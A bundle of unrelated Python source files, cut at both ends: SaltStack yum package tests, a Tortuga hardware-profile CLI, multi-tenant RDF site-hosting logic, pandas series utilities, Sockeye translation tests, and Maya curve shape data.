ignore_retcode=True,
python_shell=False)
# without fromrepo
clean_cmd = Mock()
update_cmd = MagicMock(return_value=0)
with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd,
'cmd.retcode': update_cmd}):
yumpkg.refresh_db(
check_update=True,
enablerepo='good',
disablerepo='bad',
branch='foo')
clean_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=bad',
'--enablerepo=good', '--branch=foo'],
python_shell=False)
update_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'check-update',
'--setopt=autocheck_running_kernel=false', '--disablerepo=bad',
'--enablerepo=good', '--branch=foo'],
output_loglevel='trace',
ignore_retcode=True,
python_shell=False)
# With check_update=False we will just do a cmd.run for the clean_cmd
# with fromrepo
clean_cmd = Mock()
with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd}):
yumpkg.refresh_db(
check_update=False,
fromrepo='good',
branch='foo')
clean_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=*',
'--enablerepo=good', '--branch=foo'],
python_shell=False)
# without fromrepo
clean_cmd = Mock()
with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd}):
yumpkg.refresh_db(
check_update=False,
enablerepo='good',
disablerepo='bad',
branch='foo')
clean_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=bad',
'--enablerepo=good', '--branch=foo'],
python_shell=False)
def test_install_with_options(self):
parse_targets = MagicMock(return_value=({'foo': None}, 'repository'))
with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})), \
patch.object(yumpkg, 'list_holds', MagicMock(return_value=[])), \
patch.dict(yumpkg.__salt__, {'pkg_resource.parse_targets': parse_targets}), \
patch('salt.utils.systemd.has_scope', MagicMock(return_value=False)):
# with fromrepo
cmd = MagicMock(return_value={'retcode': 0})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.install(
refresh=False,
fromrepo='good',
branch='foo')
cmd.assert_called_once_with(
['yum', '-y', '--disablerepo=*', '--enablerepo=good',
'--branch=foo', 'install', 'foo'],
output_loglevel='trace',
python_shell=False,
redirect_stderr=True)
# without fromrepo
cmd = MagicMock(return_value={'retcode': 0})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.install(
refresh=False,
enablerepo='good',
disablerepo='bad',
branch='foo')
cmd.assert_called_once_with(
['yum', '-y', '--disablerepo=bad', '--enablerepo=good',
'--branch=foo', 'install', 'foo'],
output_loglevel='trace',
python_shell=False,
redirect_stderr=True)
def test_upgrade_with_options(self):
with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})), \
patch('salt.utils.systemd.has_scope', MagicMock(return_value=False)):
# with fromrepo
cmd = MagicMock(return_value={'retcode': 0})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.upgrade(
refresh=False,
fromrepo='good',
exclude='kernel*',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '-y', '--disablerepo=*', '--enablerepo=good',
'--branch=foo', '--exclude=kernel*', 'upgrade'],
output_loglevel='trace',
python_shell=False)
# without fromrepo
cmd = MagicMock(return_value={'retcode': 0})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.upgrade(
refresh=False,
enablerepo='good',
disablerepo='bad',
exclude='kernel*',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '-y', '--disablerepo=bad', '--enablerepo=good',
'--branch=foo', '--exclude=kernel*', 'upgrade'],
output_loglevel='trace',
python_shell=False)
|
# Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import os.path
from typing import Optional
from tortuga.cli.tortugaCli import TortugaCli
from tortuga.cli.utils import ParseOperatingSystemArgAction, parse_tags
from tortuga.exceptions.invalidCliRequest import InvalidCliRequest
from tortuga.exceptions.invalidProfileCreationTemplate import \
InvalidProfileCreationTemplate
from tortuga.objects.hardwareProfile import HardwareProfile
from tortuga.wsapi.hardwareProfileWsApi import HardwareProfileWsApi
class CreateHardwareProfileCli(TortugaCli):
def parseArgs(self, usage: Optional[str] = None):
option_group_name = _('Create Hardware Profile Options')
self.addOptionGroup(option_group_name, '')
self.addOptionToGroup(option_group_name, '-j', '--json-file',
dest='jsonTemplatePath', help=argparse.SUPPRESS)
self.addOptionToGroup(option_group_name, '-t', '--template',
dest='jsonTemplatePath',
help=_('Path to JSON-formatted hardware profile'
' creation template'))
self.addOptionToGroup(
option_group_name, '--name', dest='deprecated_name',
help=argparse.SUPPRESS
)
self.addOptionToGroup(option_group_name, '--description',
dest='description',
help=_('Hardware profile description'))
self.addOptionToGroup(option_group_name, '--os',
action=ParseOperatingSystemArgAction,
metavar='OS SPEC',
dest='os',
help=_('Hardware profile operating system'))
self.addOptionToGroup(option_group_name, '--name-format',
dest='nameFormat',
help=_('Host name format'))
self.addOptionToGroup(option_group_name, '--tags',
dest='tags', metavar='key=value[,key=value]',
action='append',
help='Key-value pairs associated with the '
'hardware profile')
self.addOptionToGroup(option_group_name, '--defaults',
dest='bUseDefaults', default=False,
action='store_true',
help=_('Do not use any defaults when'
' creating the hardware profile'))
self.getParser().add_argument(
'name', metavar='NAME', nargs='?', help=_('Hardware profile name')
)
super().parseArgs(usage=usage)
def runCommand(self):
self.parseArgs()
if self.getArgs().name and self.getArgs().deprecated_name:
self.getParser().error(
'argument name: not allowed with argument --name'
)
name = self.getArgs().name \
if self.getArgs().name else self.getArgs().deprecated_name
if self.getArgs().jsonTemplatePath:
# load from template
if self.getArgs().jsonTemplatePath and \
not os.path.exists(self.getArgs().jsonTemplatePath):
raise InvalidCliRequest(
_('Cannot read template from %s') % (
self.getArgs().jsonTemplatePath))
try:
with open(self.getArgs().jsonTemplatePath) as fp:
buf = json.load(fp)
tmpl_dict = buf['hardwareProfile']
except Exception as exc:
raise InvalidProfileCreationTemplate(
'Invalid profile creation template: {}'.format(exc))
else:
tmpl_dict = {}
# build up dict from scratch
if name:
tmpl_dict['name'] = name
if self.getArgs().description:
tmpl_dict['description'] = self.getArgs().description
if hasattr(self.getArgs(), 'osInfo'):
tmpl_dict['os'] = {
'name': getattr(self.getArgs(), 'osInfo').getName(),
'version': getattr(self.getArgs(), 'osInfo').getVersion(),
'arch': getattr(self.getArgs(), 'osInfo').getArch(),
}
if self.getArgs().nameFormat:
tmpl_dict['nameFormat'] = self.getArgs().nameFormat
elif 'nameFormat' not in tmpl_dict:
tmpl_dict['nameFormat'] = 'compute-#NN'
if self.getArgs().tags:
tmpl_dict['tags'] = parse_tags(self.getArgs().tags)
settings_dict = {
'defaults': self.getArgs().bUseDefaults,
'osInfo': getattr(self.getArgs(), 'osInfo')
if hasattr(self.getArgs(), 'osInfo') else None,
}
hw_profile_spec = HardwareProfile.getFromDict(tmpl_dict)
api = self.configureClient(HardwareProfileWsApi)
api.createHardwareProfile(hw_profile_spec, settings_dict)
def main():
CreateHardwareProfileCli().run()
|
from storage import operation_primitives
import example_logic_tier as base
import rdf_json
from rdf_json import URI
import logging
import utils
import os, urlparse
from base_constants import CE, AC, RDF, AC_ALL, LDP, ADMIN_USER
from base_constants import URL_POLICY as url_policy
logging.basicConfig(level=logging.DEBUG)
MEMBER_IS_OBJECT = True
MEMBER_IS_SUBJECT = False
class Domain_Logic(base.Domain_Logic):
def default_resource_group(self):
if self.namespace == 'mt' and self.document_id == 'sites':
return self.document_url()
return super(Domain_Logic, self).default_resource_group()
def create_document(self, document):
if self.user is None:
return (401, [], None)
else:
if self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'sites':
return self.create_site(document)
elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'capabilities':
rdf_doc = rdf_json.RDF_JSON_Document(document, '')
if str(rdf_doc.get_value(RDF+'type')) == CE+'Capability':
return self.create_capability(document)
elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id != 'none' and self.extra_path_segments and self.extra_path_segments[0] == 'properties':
return super(Domain_Logic, self).create_document(document)
return(404, [], [('', 'unknown collection %s' % self.path)])
def put_document(self, document):
return(404, [], [('', 'PUT not supported')])
def execute_query(self, query):
return(400, [], [('', 'unknown query %s' % self.path)])
def get_document(self):
if self.tenant == 'hostingsite' and self.path == '/' : #home page
resource_url = url_policy.construct_url(self.request_hostname, self.tenant)
rdf_json_doc = rdf_json.RDF_JSON_Document({
resource_url: {
RDF+'type': URI(CE+'Saas_host'),
#CE+'sites': URI(url_policy.construct_url(None, 'hostingsite', 'mt', 'sites'))
CE+'sites': URI(url_policy.construct_url(None, None, 'mt', 'sites'))
}
}, resource_url)
return (200, [], rdf_json_doc)
elif self.path == '/': # home page for a particular tenant
if self.user is None:
return (401, [], None)
else:
status, document = operation_primitives.get_document(self.user, self.request_hostname, 'hostingsite', 'mt', self.tenant)
if status == 200:
site_home = document.get_value(CE+'site_home').uri_string
return [301, [('Location', str(site_home))], None]
return [status, [], document]
elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'sites': #bpc container of all sites visible to the user
if self.user is None and self.extra_path_segments and len(self.extra_path_segments) == 1 and self.extra_path_segments[0] == 'new':
return (401, [], None)
member_resource = url_policy.construct_url(self.request_hostname)
container_url = url_policy.construct_url(self.request_hostname, self.tenant, 'mt', 'sites')
document = self.create_container(container_url, member_resource, CE+'sites', MEMBER_IS_OBJECT)
status, document = self.complete_request_document(document)
return (status, [], document)
elif self.namespace == 'mt' and self.document_id == 'capabilities': #bpc container of all capabilities visible to the user
member_resource = url_policy.construct_url(self.request_hostname)
container_url = url_policy.construct_url(self.request_hostname, self.tenant, 'mt', 'capabilities')
document = self.create_container(container_url, member_resource, CE+'capabilities', MEMBER_IS_OBJECT)
status, document = self.complete_request_document(document)
return (status, [], document)
return super(Domain_Logic, self).get_document()
def add_bpc_member_properties(self, container, query=None):
if str(container.get_value(LDP+'membershipResource')) == url_policy.construct_url(self.request_hostname) and str(container.get_value(LDP+'hasMemberRelation')) == CE+'capabilities':
try:
#tricky code - change tenant to cause the query to look for data in the hostingsite's collections, not the requestor's (tenant's)
#since all stored data is relative to an implicit host (domain), this will find the same data for each tenant domain.
#Each resource that is found will be returned in the tenants domain, so capabilities are automatically mirrored in all tenant domains
#although they are only really stored in the hostingsite domain's collections
original_tenant = self.tenant
self.tenant = 'hostingsite'
result = super(Domain_Logic, self).add_bpc_member_properties(container, query)
finally:
self.tenant = original_tenant
return result
else:
return super(Domain_Logic, self).add_bpc_member_properties(container, query)
def complete_result_document(self, document):
# in this section we add any calculated triples
document_url = document.graph_url
types = document.get_values(RDF+'type')
if URI(CE+'Site') in types:
improvements = document.get_values(CE+'improvements')
tenant_id = self.document_id
tenant_base_url = url_policy.construct_url(self.request_hostname, tenant_id)
if len(improvements) > 0: # turn these relative URLs to absolute
abs_improvement_urls = [urlparse.urljoin(tenant_base_url, rel_improvement_url) for rel_improvement_url in improvements]
document.set_value(CE+'improvements', abs_improvement_urls)
document.add_triples(document_url, CE+'site_capabilities', url_policy.construct_url(self.request_hostname, tenant_id, 'mt', 'capabilities'))
return super(Domain_Logic, self).complete_result_document(document)
def patch_document(self, request_body):
if self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id != None:
return super(Domain_Logic, self).patch_document(request_body)
else:
return (400, [], [('','Patch Not yet implemented')])
def preprocess_properties_for_storage_insertion(self, rdf_json):
def make_relative(improvement_url):
abs_url_str = urlparse.urljoin(self.request_url(), str(improvement_url))
parsed_url = []
parsed_url.extend(urlparse.urlparse(abs_url_str))
parsed_url[0] = ''
parsed_url[1] = ''
return urlparse.urlunparse(parsed_url)
improvements = rdf_json.get_values(CE+'improvements')
if len(improvements) > 0: # turn these absolute URLs to relative
rdf_json.set_value(CE+'improvements', [make_relative(improvement_url) for improvement_url in improvements])
def create_site(self, document):
if self.user is None:
return (401, [], None)
field_errors = []
site = rdf_json.RDF_JSON_Document(document, '')
site_types = site.get_values(RDF+'type')
if URI(CE+'Site') not in site_types:
field_errors.append(['', 'site must have a type of CE Site'])
site_id = site.get_value(CE+'site_id')
if not (site_id):
field_errors.append(['', 'must set CE+"site_id" for site'])
else:
if not site_id.isalpha():
field_errors.append(['', 'site id must be alphanumeric'])
else:
if not site_id.islower():
field_errors.append(['', 'site id must be lowercase'])
if len(field_errors) == 0:
status, body = operation_primitives.get_document(ADMIN_USER, self.request_hostname, 'hostingsite', 'mt', site_id)
if status == 200 or site_id == 'sites': #oops - site already exists
field_errors.append([CE+'id', 'site already exists'])
else:
site.set_value(AC+'resource-group', URI('')) #group for a site is itself
status, headers, body = super(Domain_Logic, self).create_document(site, site_id)
if status == 201:
# create a UserGroup that gives the current user AC_ALL permissions for the new site
data = {
'' : {
RDF+'type': URI(AC+'UserGroup'),
AC+'who' : [ URI(self.user) ],
AC+'may' : [ URI('#permission_1') ]
},
'#permission_1' : {
AC+'do' : AC_ALL,
AC+'to' : [ URI('/') ]
}
}
ac_url = url_policy.construct_url(self.request_hostname, site_id, 'ac')
r = utils.intra_system_post(ac_url, data)
if r.status_code == 201:
return (201, headers, body)
field_errors.append(['', "failed to create UserGroup: %s %s" % (str(r.status_code), r.text)])
else:
field_errors.append(['', "unexpected error creating site: %s %s" % (str(status), str(body))])
return (400, [], field_errors)
def create_capability(self, document):
if self.user is None:
return (401, [], None)
field_errors = []
capability = rdf_json.RDF_JSON_Document(document, '')
types = capability.get_values(RDF+'type')
if URI(CE+'Capability') not in types:
field_errors.append(['', 'capability must have a type of CE Capability'])
container = capability.get_value(CE+'improvement_container')
if not container:
field_errors.append([CE+'improvement_container', 'must be set'])
improvement_type = capability.get_value(CE+'improvement_type')
if not improvement_type:
field_errors.append([CE+'improvement_type', 'must be set'])
if len(field_errors) == 0:
status_code, headers, json_document = super(Domain_Logic, self).create_document(document)
if status_code == 201:
return (201, headers, json_document)
else:
field_errors.append(['', "unexpected error creating capability: %s %s" % (str(status_code), str(json_document))])
return (400, [], field_errors)
|
from data_processing import _in_list
import pandas as pd, numpy as np
def stacked_series_flatten(ser):
'''
flatten a series containing 1-D list-like items
Parameters
----------
ser : Series
Returns
-------
sser : Series
series item with all items flatten
Example
-------
>>> import pandas as pd
>>> ser = pd.Series([[1,2,3],[4,5,6],[7,8,9]], name='array')
0 [1, 2, 3]
1 [4, 5, 6]
2 [7, 8, 9]
Name: array, dtype: object
>>> stacked_series_flatten(ser, name='array'))
0 1
1 4
2 7
3 2
4 5
5 8
6 3
7 6
8 9
Name: array, dtype: int64
'''
ser = ser.map(transfer_datatype)
sser = ser[ser.map(type) != list]
lser = ser[ser.map(type) == list]
maxn = lser.map(len).max()
if np.isnan(maxn): return sser
for i in range(int(maxn)):
sser = sser.append(lser.map(lambda x: x[i] if len(x)>i else None),ignore_index=True)
return sser.dropna()
def stacked_series_map(ser,mapfunc='count',label=None,ascending=False):
'''
map every item in a 1-D stacked series
Parameters
----------
ser : Series or DataFrame
mapfunc : str or function, default 'count'
- 'count' : count every element in series
- 'sum' : sum index of every element in series
- function
label : str, default None
ignored if type of ser is Series.
Do stacked_series_map on DataFrame's label column
ascending : bool, default False
See Also
--------
stacked_series_flatten
Examples
--------
>>> t = pd.Series([1,[4,5,6],[6,5],[3,6],[]],name='array')
>>> t
0 1
1 [4, 5, 6]
2 [6, 5]
3 [3, 6]
4 []
Name: array, dtype: object
>>> stacked_series_map(t)
count
array
6.0 3
5.0 2
1.0 1
3.0 1
4.0 1
>>> stacked_series_map(t,'sum')
sum
array
6.0 18
5.0 11
3.0 3
4.0 1
1.0 0
mapfunc can also be a function applying to a Groupby object.
>>> stacked_series_map(t,lambda x: x.max())
result
array
6.0 9.0
5.0 6.0
3.0 3.0
4.0 1.0
1.0 0.0
'''
ser.name = ser.name if ser.name else 'ser'
df = stacked_series_flatten(ser).reset_index().rename_axis({'index':'result'}, axis=1)
if type(mapfunc) == str:
if mapfunc not in ['count','sum']: raise ValueError('mapfunc param not supported, please input count or sum')
elif mapfunc == 'sum':
dfp = df.groupby(ser.name).sum().rename_axis({'result':'sum'},axis=1).sort_values('sum',ascending=ascending)
elif mapfunc == 'count':
dfp = df.groupby(ser.name).count().rename_axis({'result':'count'},axis=1).sort_values('count',ascending=ascending)
else:
dfp = df.groupby(ser.name).apply(mapfunc).sort_values('result',ascending=ascending)
del dfp[ser.name]
if type(label) == type(None): return dfp
else:
if type(label) in [dict,pd.Series]: return dfp.rename_axis(label)
elif type(label) == pd.DataFrame:
if label.shape[1]!=2:
raise ValueError('Length of DataFrame columns must be 2; %i detected'%label.shape[1])
return dfp.rename_axis(dict(label.values))
def df_filter(df, column, condition, how='find', include=True):
'''
find all records satisfying given condition
Parameters
----------
df : DataFrame
column : str
condition : iterable or scalar
list of filter rules
how : str
- 'find' : call x.find(rule)
- 're' : call re.find(rule,x)
- 'fullmatch' : x == rule
include : bool
True if you want to include all found data in df
False if you want to exclude all found data in df
'''
if not condition: return df
if type(column)==str:
condition = [condition] if type(condition) in (str,int,float) else list(condition)
df.dropna(subset=[column],inplace=True)
if include:
df = df[df[column].map(lambda x: _in_list(x,condition,how=how))]
else:
df = df[df[column].map(lambda x: not _in_list(x,condition,how=how))]
return df
else:
if include:
dfs = pd.concat([df_filter(df,c,condition,how,include) for c in column],ignore_index=True)
return dfs.drop_duplicates()
else:
dfs = df.copy()
for c in column:
dfs = df_filter(dfs,c,condition,how,include)
return dfs.drop_duplicates()
|
# Copyright 2017--2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
import os
import sys
from tempfile import TemporaryDirectory
from typing import List
from unittest.mock import patch
import pytest
import torch as pt
import sockeye.average
import sockeye.checkpoint_decoder
import sockeye.evaluate
from sockeye import constants as C
from sockeye.config import Config
from sockeye.model import load_model
from sockeye.test_utils import run_train_translate, tmp_digits_dataset
from test.common import check_train_translate
logger = logging.getLogger(__name__)
_TRAIN_LINE_COUNT = 20
_TRAIN_LINE_COUNT_EMPTY = 1
_DEV_LINE_COUNT = 5
_TEST_LINE_COUNT = 5
_TEST_LINE_COUNT_EMPTY = 2
_LINE_MAX_LENGTH = 9
_TEST_MAX_LENGTH = 20
# tuple format: (train_params, translate_params, use_prepared_data, use_source_factors)
ENCODER_DECODER_SETTINGS_TEMPLATE = [
# Basic transformer, nbest=2 decoding, no learning rate scheduler
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
# Note: We set the checkpoint interval > max updates in order to make sure we create a checkpoint when reaching
# max updates independent of the checkpoint interval
" --checkpoint-interval 20 --optimizer adam --initial-learning-rate 0.01 --learning-rate-scheduler none",
"--beam-size 2 --nbest-size 2",
False, 0, 0),
# Basic transformer w/ prepared data & greedy decoding
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01",
"--beam-size 1 --greedy",
True, 0, 0),
# Basic transformer with source and target factors, beam-search-stop first decoding
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
" --source-factors-combine sum concat average --source-factors-share-embedding true false true"
" --source-factors-num-embed 8 2 8"
" --target-factors-combine sum --target-factors-share-embedding false"
" --target-factors-num-embed 8",
"--beam-size 2 --beam-search-stop first",
True, 3, 1),
# Basic transformer with LHUC DISABLE FOR MX2 FOR NOW (UNKNOWN FAILURE)
("--encoder transformer --decoder transformer"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01 --lhuc all",
"--beam-size 2",
False, 0, 0),
# Basic transformer and length ratio prediction, and learned brevity penalty during inference
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
" --length-task ratio --length-task-weight 1.0 --length-task-layers 1",
"--beam-size 2"
" --brevity-penalty-type learned --brevity-penalty-weight 1.0",
True, 0, 0),
# Basic transformer and absolute length prediction, and constant brevity penalty during inference
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
" --length-task length --length-task-weight 1.0 --length-task-layers 1",
"--beam-size 2"
" --brevity-penalty-type constant --brevity-penalty-weight 2.0 --brevity-penalty-constant-length-ratio 1.5",
False, 0, 0),
# Basic transformer, training only the decoder
("--encoder transformer --decoder {decoder}"
" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
" --transformer-feed-forward-num-hidden 16"
" --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
" --weight-tying-type src_trg_softmax"
" --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
" --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
" --fixed-param-strategy " + C.FIXED_PARAM_STRATEGY_ALL_EXCEPT_DECODER,
"--beam-size 2",
False, 0, 0),
]
# expand test cases across transformer & ssru, as well as use_pytorch true/false
TEST_CASES = [(train_params.format(decoder=decoder), *other_params)
for decoder in C.DECODERS
for (train_params, *other_params) in ENCODER_DECODER_SETTINGS_TEMPLATE]
@pytest.mark.parametrize("train_params, translate_params, use_prepared_data,"
"n_source_factors, n_target_factors", TEST_CASES)
def test_seq_copy(train_params: str,
translate_params: str,
use_prepared_data: bool,
n_source_factors: int,
n_target_factors: int):
"""
Task: copy short sequences of digits
"""
with tmp_digits_dataset(prefix="test_seq_copy",
train_line_count=_TRAIN_LINE_COUNT,
train_line_count_empty=_TRAIN_LINE_COUNT_EMPTY,
train_max_length=_LINE_MAX_LENGTH,
dev_line_count=_DEV_LINE_COUNT,
dev_max_length=_LINE_MAX_LENGTH,
test_line_count=_TEST_LINE_COUNT,
test_line_count_empty=_TEST_LINE_COUNT_EMPTY,
test_max_length=_TEST_MAX_LENGTH,
sort_target=False,
with_n_source_factors=n_source_factors,
with_n_target_factors=n_target_factors) as data:
# TODO: Here we temporarily switch off comparing translation and scoring scores, which
# sometimes produces inconsistent results for --batch-size > 1 (see issue #639 on github).
check_train_translate(train_params=train_params,
translate_params=translate_params,
data=data,
use_prepared_data=use_prepared_data,
max_seq_len=_LINE_MAX_LENGTH,
compare_output=False)
TINY_TEST_MODEL = [(" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 4 --num-embed 4"
" --transformer-feed-forward-num-hidden 4 --weight-tying-type src_trg_softmax"
" --batch-size 2 --batch-type sentence --max-updates 4 --decode-and-evaluate 0"
" --checkpoint-interval 4",
"--beam-size 1")]
@pytest.mark.parametrize("train_params, translate_params", TINY_TEST_MODEL)
def test_other_clis(train_params: str, translate_params: str):
"""
Task: test CLIs and core features other than train & translate.
"""
with tmp_digits_dataset(prefix="test_other_clis",
train_line_count=_TRAIN_LINE_COUNT,
train_line_count_empty=_TRAIN_LINE_COUNT_EMPTY,
train_max_length=_LINE_MAX_LENGTH,
dev_line_count=_DEV_LINE_COUNT,
dev_max_length=_LINE_MAX_LENGTH,
test_line_count=_TEST_LINE_COUNT,
test_line_count_empty=0,
test_max_length=_TEST_MAX_LENGTH) as data:
# train a minimal default model
data = run_train_translate(train_params=train_params,
translate_params=translate_params,
data=data,
max_seq_len=_LINE_MAX_LENGTH)
_test_checkpoint_decoder(data['dev_source'], data['dev_target'], data['model'])
_test_parameter_averaging(data['model'])
_test_evaluate_cli(data['test_outputs'], data['test_target'])
def _test_evaluate_cli(test_outputs: List[str], test_target_path: str):
"""
Runs sockeye-evaluate CLI with translations and a reference file.
"""
with TemporaryDirectory(prefix="test_evaluate") as work_dir:
# write temporary output file
out_path = os.path.join(work_dir, 'hypotheses')
with open(out_path, 'w') as fd:
for output in test_outputs:
print(output['translation'], file=fd)
# Run evaluate cli
eval_params = "{} --hypotheses {hypotheses} --references {references} --metrics {metrics}".format(
sockeye.evaluate.__file__,
hypotheses=out_path,
references=test_target_path,
metrics="bleu chrf rouge1 ter")
with patch.object(sys, "argv", eval_params.split()):
sockeye.evaluate.main()
def _test_parameter_averaging(model_path: str):
"""
Runs parameter averaging with all available strategies
"""
for strategy in C.AVERAGE_CHOICES:
points = sockeye.average.find_checkpoints(model_path=model_path,
size=4,
strategy=strategy,
metric=C.PERPLEXITY)
assert len(points) > 0
averaged_params = sockeye.average.average(points)
assert averaged_params
def _test_checkpoint_decoder(dev_source_path: str, dev_target_path: str, model_path: str):
"""
Runs checkpoint decoder on 10% of the dev data and checks whether metric keys are present in the result dict.
"""
with open(dev_source_path) as dev_fd:
num_dev_sent = sum(1 for _ in dev_fd)
sample_size = min(1, int(num_dev_sent * 0.1))
model, source_vocabs, target_vocabs = load_model(model_folder=model_path, device=pt.device('cpu'))
cp_decoder = sockeye.checkpoint_decoder.CheckpointDecoder(device=pt.device('cpu'),
inputs=[dev_source_path],
references=[dev_target_path],
source_vocabs=source_vocabs,
target_vocabs=target_vocabs,
model=model,
model_folder=model_path,
sample_size=sample_size,
batch_size=2,
beam_size=2)
cp_metrics = cp_decoder.decode_and_evaluate()
logger.info("Checkpoint decoder metrics: %s", cp_metrics)
assert 'bleu' in cp_metrics
assert 'chrf' in cp_metrics
assert 'decode-walltime' in cp_metrics
|
<filename>programs/maya/scripts/data/curve.py<gh_stars>0
import maya.cmds as cmds
CURVE_POINTS = {
'square': [(-1, 0, -1), (1, 0, -1), (1, 0, 1), (-1, 0, 1)],
'triangle': [(-1, 0, 1), (0, 0, -1), (1, 0, 1)],
'box': [
(0.5, 0.5, 0.5), (-0.5, 0.5, 0.5), (-0.5, 0.5, -0.5), (0.5, 0.5, -0.5,), (0.5, 0.5, 0.5,),
(0.5, -0.5, 0.5,), (0.5, -0.5, -0.5,), (0.5, 0.5, -0.5,), (-0.5, 0.5, -0.5,),
(-0.5, -0.5, -0.5,), (-0.5, -0.5, 0.5,), (-0.5, 0.5, 0.5,), (-0.5, -0.5, 0.5,),
(0.5, -0.5, 0.5,), (0.5, -0.5, -0.5,), (-0.5, -0.5, -0.5,)],
'pyramid': [
(0, -0.353553, -0.707107), (-0.707107, -0.353553, 0), (0, 0.353553, 0),
(0, -0.353553, -0.707107), (0.707107, -0.353553, 0), (0, 0.353553, 0),
(0, -0.353553, 0.707107), (0.707107, -0.353553, 0), (0, -0.353553, 0.707107),
(-0.707107, -0.353553, 0)],
'diamond': [
(0, 1, 0), (1, 0, 0), (0, 0, 1), (0, 1, 0), (0, 0, -1), (-1, 0, 0), (0, 1, 0), (0, 0, 1),
(-1, 0, 0), (0, -1, 0), (0, 0, 1), (1, 0, 0), (0, -1, 0), (0, 0, -1), (1, 0, 0)],
'quad_arrow': [
(0.4, 0.0, -0.4), (0.4, 0.0, -0.6), (0.4, 0.0, -0.8), (0.4, 0.0, -1.0), (0.4, 0.0, -1.2),
(0.8, 0.0, -1.2), (0.6, 0.0, -1.4), (0.4, 0.0, -1.6), (0.2, 0.0, -1.8), (0.0, 0.0, -2.0),
(-0.2, 0.0, -1.8), (-0.4, 0.0, -1.6), (-0.6, 0.0, -1.4), (-0.8, 0.0, -1.2),
(-0.4, 0.0, -1.2), (-0.4, 0.0, -1.0), (-0.4, 0.0, -0.8), (-0.4, 0.0, -0.6),
